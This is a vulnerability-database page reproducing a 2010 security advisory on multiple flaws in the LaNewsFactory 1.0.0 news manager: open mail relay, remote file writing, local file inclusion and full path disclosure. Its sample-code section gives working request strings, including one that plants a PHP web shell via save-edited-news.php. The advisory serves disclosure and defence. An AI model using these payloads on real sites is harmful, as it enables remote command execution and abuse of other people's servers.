Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

LaNewsFactory 1.0.0 Anonymous Email / Command Execution

🗓️ 24 Apr 2010 00:00:00Reported by Salvatore FrestaType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 23 Views

LaNewsFactory 1.0.0 Multiple Remote Vulnerabilitie

Code
`  
  
LaNewsFactory Multiple Remote Vulnerabilities  
http://www.salvatorefresta.net/files/adv/LaNewsFactory%20Multiple%20Remote%20Vulnerabilities-19042010.txt  
  
Name LaNewsFactory  
Vendor Christophe Brocas  
Versions Affected <= 1.0.0  
  
Author Salvatore Fresta aka Drosophila  
Website http://www.salvatorefresta.net  
Contact salvatorefresta [at] gmail [dot] com  
Date 2010-04-19  
  
X. INDEX  
  
I. ABOUT THE APPLICATION  
II. DESCRIPTION  
III. ANALYSIS  
IV. SAMPLE CODE  
V. FIX  
VI. DISCLOSURE TIMELINE  
  
  
I. ABOUT THE APPLICATION  
  
This is a very used news manager that not require a  
database.  
  
  
II. DESCRIPTION  
  
This news managment is affected by many vulnerabilities  
that allows a guest to write arbitrary files on the  
system, include local files, read local files etc..  
  
  
III. ANALYSIS  
  
Summary:  
  
A) Anonymous email  
B) Remote File Writing  
C) Multiple Local File Inclusion  
D) Full Path Disclosure  
  
A) Anonymous email  
  
The mailto.php file allows a guest to send arbitrary emails.  
The input is not properly sanitised:  
  
if (ValidEmailAdress($youremail) and ValidEmailAdress($friendemail))  
{  
mail ($friendemail, $display[$lang]["mailtoafriend"],"$comments\n\n".$url."print".$LNF_file_extension."?art=$newsfilename\n\n$yourname", "From: $youremail");  
  
  
B) Remote File Writing  
  
The save-edited-news.php file allows a guest to write a  
file on the system. This vulnerability may be used to  
execute remote commands on the system.  
  
  
C) Multiple Local File Inclusion  
  
There are many files that use a not sanitised input with  
include PHP function. This vulnerability may be used to  
execute remote commands by including the Apache Log file.  
  
  
D) Full Path Disclosure  
  
For example, print.php file prints many errors by  
including the full path of the file. This path may be  
very useful for local file inclusion and other.  
  
  
  
IV. SAMPLE CODE  
  
A) Anonymous email  
  
[email protected]&[email protected]&comments=suck!  
  
  
B) Remote File Writing to Remote Command Execution  
  
save-edited-news.php?art=news/file.php&corps=<?php system($_GET[cmd]); ?>  
  
  
D) Full Path Disclosure  
  
print.php?art=-1.xml  
  
  
V. FIX  
  
No fix.  
  
  
VIII. DISCLOSURE TIMELINE  
  
2010-04-19 Bugs discovered  
2010-04-19 Advisory released  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
24 Apr 2010 00:00Current
7.4High risk
Vulners AI Score7.4
lanewsfactorychristophe brocasemail vulnerabilitycommand executionfile writinglocal file inclusionfull path disclosurenon-sanitized inputremote vulnerabilitiesdisclosure timeline.
23